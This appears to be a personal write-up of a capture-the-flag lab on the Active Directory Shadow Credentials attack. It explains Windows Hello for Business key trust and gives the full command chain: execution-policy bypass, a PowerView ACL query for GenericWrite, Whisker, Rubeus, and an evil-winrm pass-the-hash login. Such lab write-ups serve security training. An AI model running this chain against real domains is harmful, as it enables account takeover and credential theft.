In the Active Directory there’s users with to many permissions. We’re going to exploit these permissions to get access to other users accounts.
Learning Objectives #
- Understanding Active Directory
- Introduction to Windows Hello for Business
- Prerequisites for exploiting GenericWrite privilege
- How the Shadow Credential attack works
- How to exploit the vulnerability
Overview #
This is my key takeaways from today:
WHfB, Windows Hello for Business. A modern and secure way to replace conventional password-based authentication. It uses cryptographic keys for user verification. The users gains access using a PIN or biometrics connected to a pair of keys, public and private.msDS-KeyCredentialLinkis an attribute used by the Domain Controller (DC) to store the public key inWHfBfor enrolling a new user device.- If an attacker are capable of overriding
msDS-KeyCredentialLinkof a vulnerable user, it can be compromised. whiskeris a application that can update themsDS-KeyCredentialLinkof a vulnerable user.
Store new pair of certificates in WHfB #
- Trusted Platform module (TPM) creates a public-private key pair for the account. The private key never leaves the TPM and should never be disclosed.
- The client initiates a certificate request to receive a trustworthy certificate. The organisation’s CA (Certificate Authority) receives the request and provides a valid certificate.
- The user account’s
msDS-KeyCredentialLinkattribute will be set.
Authentication Process #
- The DC decrypts the client’s pre-authentication data using the raw public key stored in the
msDS-KeyCredentialLinkattribute of the user account. - The certificate is created for the user by the DC and sent back to the client.
- The client can log in to the AD using the certificate.
Enumeration #
We are specifically looking for any write privilege since the goal is to ovverwrite the msDS-KeyCredentialLink.
Start with bypassing powershell’s execution-policy: powershell -ep bypass.
Then load PowerView into memory: . ./Powerview.ps1.
You can now enumerate privilages. The full command to find out what we’re looking for is:
Find-InterestingDomainAcl -ResolveGuids | Where-Object { $_.IdentityReferenceName -eq "hr" } | Select-Object IdentityReferenceName, ObjectDN, ActiveDirectoryRights
We’re looking for GenericWrite in the ActiveDirectoryRights column.
If found, we can perform the Shadow Credentials attack.
Exploitation #
Whisker is a C# application that can leverage a vulnerable user and simiulate the enrollment of a malicious device, updating the msDS-KeyCredentialLink attribute.
.\Whisker.exe add /target:NAMEOFTARGET
You get a new command to run with a C# application called Rubeus.
This will get a NTLM hash to use as a pass-the-hash attack with a tool called Evil-WinRM.
evil-winrm -i 10.10.52.167 -u USERNAME -H HASH
Questions #
- What is the hash of the vulnerable user?
Run Powerview, Whisker and Rubeus in order and you’ll get the hash.
- What is the content of flag.txt on the Administrator Desktop?
run evil-winrm and change directory to the administrators desktop and you’ll get the flag..